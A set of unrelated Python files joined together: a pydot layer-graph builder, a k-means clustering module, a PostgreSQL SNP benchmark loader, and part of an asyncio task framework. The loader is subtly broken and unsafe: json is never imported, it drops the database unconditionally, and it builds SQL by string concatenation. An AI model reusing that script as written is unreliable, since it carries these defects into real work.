def pydot_graph(layers, node_creator=default_create, **kwargs):
"""Create a :class:`Dot` graph for a list of layers
Parameters
----------
layers : list of :class:`Layer` instances
The graph will be created with the layers from that list.
node_creator : callable (``default_create``)
A function that creates a :class:`Node` for a given layer.
kwargs : keyword arguments
Those will be passed down to ``node_creator`` or :class:`Node`.
"""
nodes = {}
edges = []
for layer in layers:
nodes[layer] = node_creator(layer, **kwargs)
if hasattr(layer, 'input_layers'):
for input_layer in layer.input_layers:
edges.append((input_layer, layer))
if hasattr(layer, 'input_layer'):
edges.append((layer.input_layer, layer))
graph = Dot('Network', graph_type='digraph')
for node in nodes.values():
graph.add_node(node)
for start, end in edges:
try:
graph.add_edge(Edge(nodes[start], nodes[end]))
except KeyError:
pass
return graph
| |
"""README, Author - Anurag Kumar(mailto:anuragkumarak95@gmail.com)
Requirements:
- sklearn
- numpy
- matplotlib
Python:
- 3.5
Inputs:
- X , a 2D numpy array of features.
- k , number of clusters to create.
- initial_centroids , initial centroid values generated by utility function(mentioned
in usage).
- maxiter , maximum number of iterations to process.
- heterogeneity , empty list that will be filled with hetrogeneity values if passed
to kmeans func.
Usage:
1. define 'k' value, 'X' features array and 'hetrogeneity' empty list
2. create initial_centroids,
initial_centroids = get_initial_centroids(
X,
k,
seed=0 # seed value for initial centroid generation,
# None for randomness(default=None)
)
3. find centroids and clusters using kmeans function.
centroids, cluster_assignment = kmeans(
X,
k,
initial_centroids,
maxiter=400,
record_heterogeneity=heterogeneity,
verbose=True # whether to print logs in console or not.(default=False)
)
4. Plot the loss function, hetrogeneity values for every iteration saved in
hetrogeneity list.
plot_heterogeneity(
heterogeneity,
k
)
5. Transfers Dataframe into excel format it must have feature called
'Clust' with k means clustering numbers in it.
"""
import warnings
import numpy as np
import pandas as pd
from matplotlib import pyplot as plt
from sklearn.metrics import pairwise_distances
warnings.filterwarnings("ignore")
TAG = "K-MEANS-CLUST/ "
def get_initial_centroids(data, k, seed=None):
"""Randomly choose k data points as initial centroids"""
if seed is not None: # useful for obtaining consistent results
np.random.seed(seed)
n = data.shape[0] # number of data points
# Pick K indices from range [0, N).
rand_indices = np.random.randint(0, n, k)
# Keep centroids as dense format, as many entries will be nonzero due to averaging.
# As long as at least one document in a cluster contains a word,
# it will carry a nonzero weight in the TF-IDF vector of the centroid.
centroids = data[rand_indices, :]
return centroids
def centroid_pairwise_dist(X, centroids):
return pairwise_distances(X, centroids, metric="euclidean")
def assign_clusters(data, centroids):
# Compute distances between each data point and the set of centroids:
# Fill in the blank (RHS only)
distances_from_centroids = centroid_pairwise_dist(data, centroids)
# Compute cluster assignments for each data point:
# Fill in the blank (RHS only)
cluster_assignment = np.argmin(distances_from_centroids, axis=1)
return cluster_assignment
def revise_centroids(data, k, cluster_assignment):
new_centroids = []
for i in range(k):
# Select all data points that belong to cluster i. Fill in the blank (RHS only)
member_data_points = data[cluster_assignment == i]
# Compute the mean of the data points. Fill in the blank (RHS only)
centroid = member_data_points.mean(axis=0)
new_centroids.append(centroid)
new_centroids = np.array(new_centroids)
return new_centroids
def compute_heterogeneity(data, k, centroids, cluster_assignment):
heterogeneity = 0.0
for i in range(k):
# Select all data points that belong to cluster i. Fill in the blank (RHS only)
member_data_points = data[cluster_assignment == i, :]
if member_data_points.shape[0] > 0: # check if i-th cluster is non-empty
# Compute distances from centroid to data points (RHS only)
distances = pairwise_distances(
member_data_points, [centroids[i]], metric="euclidean"
)
squared_distances = distances**2
heterogeneity += np.sum(squared_distances)
return heterogeneity
def plot_heterogeneity(heterogeneity, k):
plt.figure(figsize=(7, 4))
plt.plot(heterogeneity, linewidth=4)
plt.xlabel("# Iterations")
plt.ylabel("Heterogeneity")
plt.title(f"Heterogeneity of clustering over time, K={k:d}")
plt.rcParams.update({"font.size": 16})
plt.show()
def kmeans(
data, k, initial_centroids, maxiter=500, record_heterogeneity=None, verbose=False
):
"""This function runs k-means on given data and initial set of centroids.
maxiter: maximum number of iterations to run.(default=500)
record_heterogeneity: (optional) a list, to store the history of heterogeneity
as function of iterations
if None, do not store the history.
verbose: if True, print how many data points changed their cluster labels in
each iteration"""
centroids = initial_centroids[:]
prev_cluster_assignment = None
for itr in range(maxiter):
if verbose:
print(itr, end="")
# 1. Make cluster assignments using nearest centroids
cluster_assignment = assign_clusters(data, centroids)
# 2. Compute a new centroid for each of the k clusters, averaging all data
# points assigned to that cluster.
centroids = revise_centroids(data, k, cluster_assignment)
# Check for convergence: if none of the assignments changed, stop
if (
prev_cluster_assignment is not None
and (prev_cluster_assignment == cluster_assignment).all()
):
break
# Print number of new assignments
if prev_cluster_assignment is not None:
num_changed = np.sum(prev_cluster_assignment != cluster_assignment)
if verbose:
print(
" {:5d} elements changed their cluster assignment.".format(
num_changed
)
)
# Record heterogeneity convergence metric
if record_heterogeneity is not None:
# YOUR CODE HERE
score = compute_heterogeneity(data, k, centroids, cluster_assignment)
record_heterogeneity.append(score)
prev_cluster_assignment = cluster_assignment[:]
return centroids, cluster_assignment
# Mock test below
if False: # change to true to run this test case.
from sklearn import datasets as ds
dataset = ds.load_iris()
k = 3
heterogeneity = []
initial_centroids = get_initial_centroids(dataset["data"], k, seed=0)
centroids, cluster_assignment = kmeans(
dataset["data"],
k,
initial_centroids,
maxiter=400,
record_heterogeneity=heterogeneity,
verbose=True,
)
plot_heterogeneity(heterogeneity, k)
def ReportGenerator(
df: pd.DataFrame, ClusteringVariables: np.ndarray, FillMissingReport=None
) -> pd.DataFrame:
"""
Function generates easy-erading clustering report. It takes 2 arguments as an input:
DataFrame - dataframe with predicted cluester column;
FillMissingReport - dictionary of rules how we are going to fill missing
values of for final report generate (not included in modeling);
in order to run the function following libraries must be imported:
import pandas as pd
import numpy as np
>>> data = pd.DataFrame()
>>> data['numbers'] = [1, 2, 3]
>>> data['col1'] = [0.5, 2.5, 4.5]
>>> data['col2'] = [100, 200, 300]
>>> data['col3'] = [10, 20, 30]
>>> data['Cluster'] = [1, 1, 2]
>>> ReportGenerator(data, ['col1', 'col2'], 0)
Features Type Mark 1 2
0 # of Customers ClusterSize False 2.000000 1.000000
1 % of Customers ClusterProportion False 0.666667 0.333333
2 col1 mean_with_zeros True 1.500000 4.500000
3 col2 mean_with_zeros True 150.000000 300.000000
4 numbers mean_with_zeros False 1.500000 3.000000
.. ... ... ... ... ...
99 dummy 5% False 1.000000 1.000000
100 dummy 95% False 1.000000 1.000000
101 dummy stdev False 0.000000 NaN
102 dummy mode False 1.000000 1.000000
103 dummy median False 1.000000 1.000000
<BLANKLINE>
[104 rows x 5 columns]
"""
# Fill missing values with given rules
if FillMissingReport:
df.fillna(value=FillMissingReport, inplace=True)
df["dummy"] = 1
numeric_cols = df.select_dtypes(np.number).columns
report = (
df.groupby(["Cluster"])[ # construct report dataframe
numeric_cols
] # group by cluster number
.agg(
[
("sum", np.sum),
("mean_with_zeros", lambda x: np.mean(np.nan_to_num(x))),
("mean_without_zeros", lambda x: x.replace(0, np.NaN).mean()),
(
"mean_25-75",
lambda x: np.mean(
np.nan_to_num(
sorted(x)[
round(len(x) * 25 / 100) : round(len(x) * 75 / 100)
]
)
),
),
("mean_with_na", np.mean),
("min", lambda x: x.min()),
("5%", lambda x: x.quantile(0.05)),
("25%", lambda x: x.quantile(0.25)),
("50%", lambda x: x.quantile(0.50)),
("75%", lambda x: x.quantile(0.75)),
("95%", lambda x: x.quantile(0.95)),
("max", lambda x: x.max()),
("count", lambda x: x.count()),
("stdev", lambda x: x.std()),
("mode", lambda x: x.mode()[0]),
("median", lambda x: x.median()),
("# > 0", lambda x: (x > 0).sum()),
]
)
.T.reset_index()
.rename(index=str, columns={"level_0": "Features", "level_1": "Type"})
) # rename columns
# calculate the size of cluster(count of clientID's)
clustersize = report[
(report["Features"] == "dummy") & (report["Type"] == "count")
].copy() # avoid SettingWithCopyWarning
clustersize.Type = (
"ClusterSize" # rename created cluster df to match report column names
)
clustersize.Features = "# of Customers"
clusterproportion = pd.DataFrame(
clustersize.iloc[:, 2:].values
/ clustersize.iloc[:, 2:].values.sum() # calculating the proportion of cluster
)
clusterproportion[
"Type"
] = "% of Customers" # rename created cluster df to match report column names
clusterproportion["Features"] = "ClusterProportion"
cols = clusterproportion.columns.tolist()
cols = cols[-2:] + cols[:-2]
clusterproportion = clusterproportion[cols] # rearrange columns to match report
clusterproportion.columns = report.columns
a = pd.DataFrame(
abs(
report[report["Type"] == "count"].iloc[:, 2:].values
- clustersize.iloc[:, 2:].values
)
) # generating df with count of nan values
a["Features"] = 0
a["Type"] = "# of nan"
a.Features = report[
report["Type"] == "count"
].Features.tolist() # filling values in order to match report
cols = a.columns.tolist()
cols = cols[-2:] + cols[:-2]
a = a[cols] # rearrange columns to match report
a.columns = report.columns # rename columns to match report
report = report.drop(
report[report.Type == "count"].index
) # drop count values except cluster size
report = pd.concat(
[report, a, clustersize, clusterproportion], axis=0
) # concat report with clustert size and nan values
report["Mark"] = report["Features"].isin(ClusteringVariables)
cols = report.columns.tolist()
cols = cols[0:2] + cols[-1:] + cols[2:-1]
report = report[cols]
sorter1 = {
"ClusterSize": 9,
"ClusterProportion": 8,
"mean_with_zeros": 7,
"mean_with_na": 6,
"max": 5,
"50%": 4,
"min": 3,
"25%": 2,
"75%": 1,
"# of nan": 0,
"# > 0": -1,
"sum_with_na": -2,
}
report = (
report.assign(
Sorter1=lambda x: x.Type.map(sorter1),
Sorter2=lambda x: list(reversed(range(len(x)))),
)
.sort_values(["Sorter1", "Mark", "Sorter2"], ascending=False)
.drop(["Sorter1", "Sorter2"], axis=1)
)
report.columns.name = ""
report = report.reset_index()
report.drop(columns=["index"], inplace=True)
return report
if __name__ == "__main__":
import doctest
doctest.testmod()
| |
import argparse
import csv, os, time
import psycopg2 # psycopg2 v2.5.1
import sys
sys.path.append('../modules')
from result import Result
# Get command line arguments
parser = argparse.ArgumentParser(description='Load SNP and locus data')
parser.add_argument('--dev', action='store_true', help='Only load chromosome 21 for development testing')
parser.add_argument('--db', type=str, help='Postgres database name')
parser.add_argument('--username', type=str, help='Postgres username')
parser.add_argument('--password', type=str, help='Postgres password')
parser.add_argument('--jsonb', action='store_true', help='Use pgsql binary json type')
parser.add_argument('--pgcopy', action='store_true', help='Load data from file with COPY method')
parser.add_argument('--tag', type=str, help='Tag to place in results file')
parser.add_argument('--path', help='Path to chromosome data')
parser.add_argument('--start', type=str, help='Chromosome to start load from')
parser.add_argument('--indexes', action='store_true', help='Create indexes')
parser.add_argument('--queries', action='store_true', help='Run queries')
args = parser.parse_args()
# Set script version
scriptVersion = "2.0"
# Set default variables
dev = False
pgcopy = False
createIndexes = False
runQueries = False
databaseName = 'snp_research'
username = 'dev'
password = ''
path = ''
tag = ''
start = '1'
jsonb = False
# Update any present from CLI
if args.dev: # If dev mode, only load chr 21
dev = True
if args.path is not None: # If set, use as root path for chromosome data
path = args.path
if args.db is not None: # If set, use as database name for Postgres
databaseName = args.db
if args.username is not None: # Postgres username
username = args.username
if args.password is not None: # Postgres password
password = args.password
if args.jsonb:
jsonb = True
if args.pgcopy is not None:
pgcopy = args.pgcopy
if args.tag is not None: # Tag to place in results file
tag = args.tag
if args.start is not None:
start = args.start
if args.indexes is not None:
createIndexes = args.indexes
if args.queries is not None:
runQueries = args.queries
# Open results file
resultsFileName = 'results-pgsql-json'
if resultsFileName != "":
resultsFileName += '-' + tag
resultsFileName += '.txt'
resultsFile = open(resultsFileName, 'w')
resultsFile.write(scriptVersion + '\n')
result = Result()
resultsFile.write(result.toHeader() + '\n')
# Data files
snpFilePath = 'snpData-chr{0}.txt'
lociFilePath = 'lociData-chr{0}.txt'
# Chromosome list
chromosomes = ["21"] # dev list
# If not in dev mode, iterate through all chromosomes
if dev is False:
chromosomes = ["1","2","3","4","5","6","7","8","9","10","11","12","13","14","15","16","17","18","19","20","21","22","X","Y","MT"] # complete list
if start != "1": # Allow restart from anywhere in chromosome list, sequentially as ordered above
startList = []
hitMin = False
for cur in chromosomes:
if cur == start:
hitMin = True
if hitMin:
startList.append(cur)
chromosomes = startList
# Create Postgres database, tables if not exists
# For initial connection, connect to user database and then create the experimental db
postgresConnection = psycopg2.connect("dbname=" + username + " user=" + username)
postgresConnection.autocommit = True
createDbCursor = postgresConnection.cursor()
createDbCursor.execute("DROP DATABASE " + databaseName)
createDbCursor.execute("CREATE DATABASE " + databaseName)
createDbCursor.close()
postgresConnection.close() # Reconnect with database name
# Reopen connection to the experimental database to create tables and begin inserts
postgresConnection = psycopg2.connect("dbname=" + databaseName + " user=" + username)
createDbCursor = postgresConnection.cursor()
TABLES = {}
if jsonb:
TABLES['snp'] = (
"CREATE TABLE IF NOT EXISTS snp ("
" id serial PRIMARY KEY,"
" jsondata jsonb"
");")
else:
TABLES['snp'] = (
"CREATE TABLE IF NOT EXISTS snp ("
" id serial PRIMARY KEY,"
" jsondata json"
");")
for name, ddl in TABLES.iteritems():
createDbCursor.execute(ddl)
postgresConnection.commit()
# Disable triggers/constraints on tables
createDbCursor.execute("ALTER TABLE snp DISABLE trigger ALL;")
createDbCursor.close()
# Dictionaries and arrays for SQL and MongoDB queries
documents = {} # Dictionary for MongoDB SNP/loci documents
for curChr in chromosomes:
result = Result()
result.method = "pgsql-json"
if jsonb:
result.method = "pgsql-jsonb"
result.tag = tag
print "Chromosome " + str(curChr)
result.chromosome = str(curChr)
# Set file paths for current chromosome
curSnpFilePath = snpFilePath.format(curChr)
curLociFilePath = lociFilePath.format(curChr)
if len(path) > 0:
curSnpFilePath = path.rstrip('\\').rstrip('/') + '\\' + curSnpFilePath
curLociFilePath = path.rstrip('\\').rstrip('/') + '\\' + curLociFilePath
documents.clear()
print "Chromosome " + str(curChr) + ". Reading SNP Data"
result.snpLoadStart = time.time()
sys.stdout.flush()
# Read in data from SNP file
with open(curSnpFilePath,'r') as csvfile:
data = csv.reader(csvfile,delimiter='\t')
for row in data:
if(len(row) == 3):
hasSig = False
if row[2] != '' and row[2] != 'false':
hasSig = True
documents[row[0]] = {"rsid":row[0], "chr":row[1], "has_sig":hasSig, "loci":[]}
result.snpLoadEnd = time.time()
print "Chromosome " + str(curChr) + ". Reading loci Data."
result.lociLoadStart = time.time()
# Now that we have primary keys for each SNP, read in loci data
with open(curLociFilePath,'r') as csvfile:
data = csv.reader(csvfile,delimiter='\t')
for row in data:
if(len(row) == 4 and row[0] in documents):
# Load loci in Mongo documents
curDoc = documents[row[0]]
if curDoc["loci"] is None:
curDoc["loci"] = [{"mrna_acc":row[1],"gene":row[2],"class":row[3]}]
else:
curDoc["loci"].append({"mrna_acc":row[1],"gene":row[2],"class":row[3]})
documents[row[0]] = curDoc
cursor = postgresConnection.cursor()
# Data for reporting
result.lociLoadEnd = time.time()
result.totalDocuments = len(documents)
print "Starting to insert " + str(result.totalDocuments) + " documents"
sys.stdout.flush()
# Log start time for MongoDB inserts
result.documentInsertStart = time.time()
if pgcopy:
mimpfile = "/home/ec2-user/jsonchr" + str(curChr) + ".json"
print "Writing json file for copy"
sys.stdout.flush()
fp = open(mimpfile,'w')
for curDoc in documents.values():
json.dump(curDoc,fp)
fp.write('\n')
fp.close()
print "Loading json with copy method"
sys.stdout.flush()
# Restart insert time
result.documentInsertStart = time.time()
cursor.execute("COPY snp (jsondata) FROM '" + mimpfile + "'")
os.remove(mimpfile)
else:
print "Individual document inserting starting"
sys.stdout.flush()
# Insert each document with SNP and loci data
for v in documents.iteritems():
cursor.execute("insert into snp (jsondata) values (%s)", [json.dumps(v[1])])
# Commit data to pgsql
postgresConnection.commit()
# Log end time and total pgsql time
result.documentInsertEnd = time.time()
result.calculate()
# Close pgsql cursor
cursor.close()
print result.toTerm()
resultsFile.write(result.toString() + '\n')
sys.stdout.flush()
# Create new cursor, create indexes and run test queries
cursor = postgresConnection.cursor()
print "Turning on key checks..."
cursor.execute("ALTER TABLE snp ENABLE trigger ALL;")
if createIndexes:
result = Result()
result.method = "pgsql-jsonIdx"
result.tag = tag
rsidIndex = "CREATE INDEX idx_rsid ON snp USING GIN ((jsondata -> 'rsid'))"
clinIndex = "CREATE INDEX idx_clin ON snp USING GIN ((jsondata -> 'has_sig'))"
geneIndex = "CREATE INDEX idx_gene ON snp USING GIN ((jsondata -> 'loci') jsonb_path_ops)"
fullIndex = "CREATE INDEX idx_full ON snp USING GIN ((jsondata) jsonb_path_ops)"
print "Creating RSID index..."
sys.stdout.flush()
idxStart = time.time()
cursor.execute(rsidIndex)
postgresConnection.commit()
idxEnd = time.time()
result.idxRsid = idxEnd - idxStart
print "Creating ClinSig index..."
sys.stdout.flush()
idxStart = time.time()
cursor.execute(clinIndex)
postgresConnection.commit()
idxEnd = time.time()
result.idxClinSig = idxEnd - idxStart
print "Creating Gene index..."
sys.stdout.flush()
idxStart = time.time()
cursor.execute(geneIndex)
postgresConnection.commit()
idxEnd = time.time()
result.idxGene = idxEnd - idxStart
print "Creating full GIN index..."
sys.stdout.flush()
idxStart = time.time()
cursor.execute(fullIndex)
postgresConnection.commit()
idxEnd = time.time()
print "Full GIN Index: " + str(idxEnd-idxStart)
resultsFile.write(result.toString() + '\n')
sys.stdout.flush()
if runQueries:
for z in range(1,11):
result = Result()
result.method = "pgsql-jsonQry" + str(z)
result.tag = tag
print "Running queries, count " + str(z)
sys.stdout.flush()
idxStart = time.time()
cursor.execute('SELECT * FROM snp WHERE jsondata @> \'{"rsid" : "rs8788"}\'')
idxEnd = time.time()
result.qryByRsid = idxEnd - idxStart
idxStart = time.time()
cursor.execute('SELECT count(*) FROM snp WHERE jsondata @> \'{"has_sig":true}\'')
idxEnd = time.time()
result.qryByClinSig = idxEnd - idxStart
idxStart = time.time()
cursor.execute('SELECT count(*) FROM snp WHERE jsondata->\'loci\' @> \'[{"gene":"GRIN2B"}]\'')
idxEnd = time.time()
result.qryByGene = idxEnd - idxStart
idxStart = time.time()
cursor.execute('SELECT count(*) FROM snp WHERE jsondata->\'loci\' @> \'[{"loci.gene":"GRIN2B"}]\' AND jsondata @> \'{"has_sig":true}\'')
idxEnd = time.time()
result.qryByGeneSig = idxEnd - idxStart
resultsFile.write(result.toString() + '\n')
# Close pgsql cursor
cursor.close()
resultsFile.close()
postgresConnection.close()
print "Run complete."
| |
'''
LICENSING
-------------------------------------------------
loopa: Arduino-esque event loop app framework, and other utilities.
Copyright (C) 2016 Muterra, Inc.
Contributors
------------
Nick Badger
badg@muterra.io | badg@nickbadger.com | nickbadger.com
This library is free software; you can redistribute it and/or
modify it under the terms of the GNU Lesser General Public
License as published by the Free Software Foundation; either
version 2.1 of the License, or (at your option) any later version.
This library is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
Lesser General Public License for more details.
You should have received a copy of the GNU Lesser General Public
License along with this library; if not, write to the
Free Software Foundation, Inc.,
51 Franklin Street,
Fifth Floor,
Boston, MA 02110-1301 USA
------------------------------------------------------
'''
# External deps
import logging
import asyncio
import threading
import weakref
import traceback
import collections
import inspect
# In-package deps
from .utils import await_coroutine_threadsafe
# from .exceptions import LoopaException
# ###############################################
# Boilerplate
# ###############################################
# Control * imports.
__all__ = [
'ManagedTask',
'TaskLooper',
'TaskCommander',
'Aengel',
'NoopLoop'
]
logger = logging.getLogger(__name__)
# ###############################################
# Etc
# ###############################################
_TaskDef = collections.namedtuple(
typename = '_TaskDef',
field_names = ('args', 'kwargs'),
)
class _ThreadHelper(threading.Thread):
''' Helper class to allow us to pass args and kwargs to the thread
later than otherwise intended.
'''
ARGSIG = inspect.Signature.from_callable(threading.Thread)
def __init__(self, *args, **kwargs):
''' Warn for any args or kwargs that will be ignored.
'''
super().__init__(*args, **kwargs)
self.__args = None
self.__kwargs = None
self.__target = None
def set_target(self, target, args, kwargs):
''' Do this so that ManagedTask's start() method can pass args
and kwargs to the target.
'''
self.__target = target
self.__args = args
self.__kwargs = kwargs
def run(self):
''' Call to self.__target, passing self.__args and self.__kwargs
'''
self.__target(self.__args, self.__kwargs)
# ###############################################
# Lib
# ###############################################
class ManagedTask:
''' Manages thread shutdown (etc) for a thread whose sole purpose is
running an event loop.
'''
def __init__(self, *args, threaded=False, debug=False, aengel=None,
reusable_loop=False, start_timeout=None, thread_args=tuple(),
thread_kwargs={}, **kwargs):
''' Creates a ManagedTask.
*args and **kwargs will be passed to the threading.Thread
constructor iff threaded=True. Otherwise, they will be ignored.
Loop init arguments should be passed through the start() method.
if executor is None, defaults to the normal executor.
if reusable_loop=True, the ManagedTask can be run more than
once, but you're responsible for manually calling finalize() to
clean up the loop. Except this doesn't work at the moment,
because the internal thread is not reusable.
'''
super().__init__(*args, **kwargs)
if aengel is not None:
aengel.prepend_guardling(self)
self._debug = bool(debug)
self.reusable_loop = bool(reusable_loop)
self._start_timeout = start_timeout
# This is our actual asyncio.Task
self._task = None
# These flags control blocking when threaded
self._startup_complete_flag = threading.Event()
self._shutdown_complete_flag = threading.Event()
# And deal with threading
if threaded:
self.threaded = True
self._loop = asyncio.new_event_loop()
# Save args and kwargs for the thread creation
self._thread_args = thread_args
self._thread_kwargs = thread_kwargs
# Do this here so we can fail fast, instead of when calling start
# Set up a thread for the loop
try:
_ThreadHelper.ARGSIG.bind(
*thread_args,
daemon = False,
target = None,
args = tuple(),
kwargs = {},
**thread_kwargs
)
except TypeError as exc:
raise TypeError(
'Improper *args and/or **kwargs for threaded ' +
'ManagedTask: ' + str(exc)
) from None
else:
self.threaded = False
self._loop = asyncio.get_event_loop()
# Declare the thread as nothing.
self._thread = None
# This controls blocking for async stuff on exit
self._exiting_task = asyncio.Event(loop=self._loop)
def start(self, *args, **kwargs):
''' Dispatches start() to self._start() or self._thread.start(),
as appropriate. Passes *args and **kwargs along to the task_run
method.
'''
if self.threaded:
# Delay thread generation until starting.
self._thread = _ThreadHelper(
daemon = False,
target = None,
args = tuple(),
kwargs = {},
*self._thread_args,
**self._thread_kwargs
)
# Update the thread's target and stuff and then run it
self._thread.set_target(self._run, args, kwargs)
self._thread.start()
self._startup_complete_flag.wait(timeout=self._start_timeout)
else:
# This is redundant, but do it anyways in case other code changes
self._thread = None
self._run(args, kwargs)
def _run(self, args, kwargs):
''' Handles everything needed to start the loop within the
current context/thread/whatever. May be extended, but MUST be
called via super().
'''
self._loop.set_debug(self._debug)
self._shutdown_complete_flag.clear()
try:
try:
# If we're running in a thread, we MUST explicitly set up the
# event loop
if self.threaded:
asyncio.set_event_loop(self._loop)
# Start the task.
self._looper_future = asyncio.ensure_future(
self._execute_task(args, kwargs)
)
# Note that this will automatically return the future's result
# (or raise its exception). We don't use the result, so...
self._loop.run_until_complete(self._looper_future)
finally:
# Just in case we're reusable, reset the _thread so start()
# generates a new one on next call.
self._thread = None
if not self.reusable_loop:
self.finalize()
# Careful: stop_threadsafe could be waiting on shutdown_complete.
# Give these an extra layer of protection so that the close() caller
# can always return, even if closing the loop errored for some reason
finally:
# Only bother doing this if being called directly (not from within
# a parent commander)
self._exiting_task = None
self._startup_complete_flag.clear()
self._shutdown_complete_flag.set()
def stop(self):
''' ONLY TO BE CALLED FROM WITHIN OUR RUNNING TASKS! Do NOT call
this wrapped in a call_coroutine_threadsafe or
run_coroutine_loopsafe; instead use the direct methods.
Always returns immediately and cannot wait for closure of the
loop (chicken vs egg).
'''
if not self._startup_complete_flag.is_set():
raise RuntimeError('Cannot stop before startup is complete.')
logger.debug('Cancelling task via stop: ' + repr(self))
self._task.cancel()
def stop_threadsafe_nowait(self):
''' Stops us from within a different thread without waiting for
closure.
'''
if self._loop.is_running():
self._loop.call_soon_threadsafe(self.stop)
else:
self._shutdown_complete_flag.set()
def stop_threadsafe(self, timeout=None):
''' Stops us from within a different thread.
'''
self.stop_threadsafe_nowait()
self._shutdown_complete_flag.wait(timeout=timeout)
async def task_run(self):
''' Serves as a landing point for coop multi-inheritance.
Override this to actually do something.
'''
pass
async def _execute_task(self, args, kwargs):
''' Actually executes the task at hand.
'''
try:
try:
self._task = asyncio.ensure_future(
self.task_run(*args, **kwargs)
)
finally:
# Don't wait to set the startup flag until we return control to
# the loop, because we already "started" the tasks.
self._startup_complete_flag.set()
# Raise the task's exception or return its result. More likely
# than not, this will only happen if the worker finishes first.
# asyncio handles raising the exception for us here.
try:
result = await asyncio.wait_for(self._task, timeout=None)
except asyncio.CancelledError:
logger.debug('Cancelling task: ' + repr(self))
self._task.cancel()
result = None
return result
# Reset the termination flag on the way out, just in case.
# NOTE THAT WE MAY HAVE THINGS WAITING FOR US TO EXIT, but that the
# loop itself will stop running when this coro completes! So we need
# to wait for any waiters to clear.
finally:
self._exiting_task.set()
self._task = None
def _abort(self):
''' Performs any needed cancellation propagation (etc).
Must only be called from within the event loop.
'''
pass
def finalize(self):
''' Close the event loop and perform any other necessary
ManagedTask cleanup. Task cleanup should be handled within the
task.
'''
self._loop.close()
class TaskLooper(ManagedTask):
''' Basically, the Arduino of event loops. Can be invoked directly
for a single-purpose app loop, or can be added to a LoopaCommanda to
enable multiple simultaneous app loops.
Requires subclasses to define an async loop_init function and a
loop_run function. Loop_run is handled within a "while running"
construct.
Optionally, async def loop_stop may be defined for cleanup.
'''
def __init__(self, *args, **kwargs):
''' Add a loop_init event to self.
'''
super().__init__(*args, **kwargs)
# Use the explicit loop! We may be in a different thread than the
# eventual start() call.
self._init_complete = asyncio.Event(loop=self._loop)
async def loop_init(self):
''' Endpoint for cooperative multiple inheritance.
'''
pass
async def loop_run(self):
''' Endpoint for cooperative multiple inheritance.
'''
pass
async def loop_stop(self):
''' Endpoint for cooperative multiple inheritance.
'''
pass
async def task_run(self, *args, **kwargs):
''' Wraps up all of the loop stuff.
'''
try:
logger.debug('Loop init starting: ' + repr(self))
await self.loop_init(*args, **kwargs)
logger.debug('Loop init finished: ' + repr(self))
self._init_complete.set()
try:
while True:
# We need to guarantee that we give control back to the
# event loop at least once (even if running all synchronous
# code) to catch any cancellations.
# TODO: is there a better way than this?
await asyncio.sleep(0)
await self.loop_run()
finally:
# Clear init.
self._init_complete.clear()
logger.debug('Loop stop starting: ' + repr(self))
# Prevent cancellation of the loop stop.
await asyncio.shield(self.loop_stop())
logger.debug('Loop stop finished: ' + repr(self))
except asyncio.CancelledError:
# Don't log the cancellation error, because it's expected shutdown
# behavior.
logger.debug('Looped task cancelled: ' + repr(self))
raise
except Exception as exc:
logger.error(
'Error while running looped task: ' + repr(self) +
' w/ traceback:\n' + ''.join(traceback.format_exc())
)
raise
async def await_init(self):
''' Awaits for loop_init to complete. Won't work from within a
TaskCommander.
'''
await self._init_complete.wait()
class TaskCommander(ManagedTask):
''' Sets up a ManagedTask to run tasks instead of just a single
coro.
TODO: support addition of tasks while running.
TODO: support removal of tasks while running.
TODO: support garbage collection of completed tasks.
TODO: consider creating managed tasks and task loopers through the
commander instead of independently?
'''
def __init__(self, *args, suppress_child_exceptions=False, **kwargs):
''' In addition to super(), we also need to add in some variable
inits.
'''
super().__init__(*args, **kwargs)
# Lookup for task -> future
self._futures_by_mgmts = {}
# Lookup for future -> task
self._mgmts_by_future = {}
# Lookup for order -> task, start args, start kwargs
# Order this so that startup completes as defined
self._to_start = []
self._invocations = {}
# Lookup for task -> result
self._results = {}
# Lookup to see which ones are taskloopers
self._mgmts_with_init = set()
# Notify that all mgmts have completed their inits.
self._init_complete = asyncio.Event(loop=self._loop)
self._stop_complete = asyncio.Event(loop=self._loop)
# This determines if a completed task that ended in an exception is
# just logged, or if it will bubble up and end the entire commander
self.suppress_child_exceptions = suppress_child_exceptions
def register_task(self, task, *args, before_task=None, after_task=None,
**kwargs):
''' Registers a task to start when the TaskCommander is run.
Since the task's _loop is replaced, this is an irreversable
action.
'''
if not isinstance(task, ManagedTask):
raise TypeError('Task must be a ManagedTask instance.')
elif task in self._to_start:
raise ValueError(
'Tasks can only be added once. Create a new instance of the ' +
'task to run multiple copies.'
)
elif bool(before_task) & bool(after_task):
raise ValueError(
'Task may be inserted before or after another task, but not ' +
'both!'
)
else:
self._insert_task(task, before_task, after_task, args, kwargs)
def _insert_task(self, task, before_task, after_task, args, kwargs):
''' Perform actual task insertion.
'''
if before_task is not None:
target_index = self._to_start.index(before_task)
self._to_start.insert(target_index, task)
elif after_task is not None:
target_index = self._to_start.index(after_task) + 1
self._to_start.insert(target_index, task)
else:
self._to_start.append(task)
self._invocations[task] = _TaskDef(args, kwargs)
# Wait to do this until after inserting task, so that any errors will
# prevent modification to the original task.
if hasattr(task, '_init_complete'):
task._init_complete = asyncio.Event(loop=self._loop)
task._stop_complete = asyncio.Event(loop=self._loop)
self._mgmts_with_init.add(task)
# This controls blocking for async stuff on exit
task._exiting_task = asyncio.Event(loop=self._loop)
task._loop = self._loop
async def _forward_harch(self):
''' Get them juices flowing! Start all tasks.
'''
tasks_available = []
for mgmt in self._to_start:
args, kwargs = self._invocations[mgmt]
task = asyncio.ensure_future(
mgmt._execute_task(args, kwargs)
)
self._futures_by_mgmts[mgmt] = task
self._mgmts_by_future[task] = mgmt
tasks_available.append(task)
# If it has an init, wait for that init to complete before
# starting the next task.
if mgmt in self._mgmts_with_init:
await mgmt._init_complete.wait()
return tasks_available
async def _company_halt(self, tasks):
''' Stop all of the remaining running tasks in tasks. Performed
in reverse order to starting.
'''
try:
logger.debug('Stopping all remaining tasks: ' + repr(self))
for task in reversed(tasks):
task.cancel()
# Wait for the task to exit and then clear all startup flags.
mgmt = self._mgmts_by_future[task]
logger.debug(repr(self) + ' awaiting task exit: ' + repr(mgmt))
await mgmt._exiting_task.wait()
mgmt._startup_complete_flag.clear()
# Wait until all tasks have finished closure.
# Only wait if we have things to wait for, or this will error out.
if tasks:
# And wait for them all to complete (note that this will
# delay shutdown!)
await asyncio.wait(
fs = tasks,
return_when = asyncio.ALL_COMPLETED,
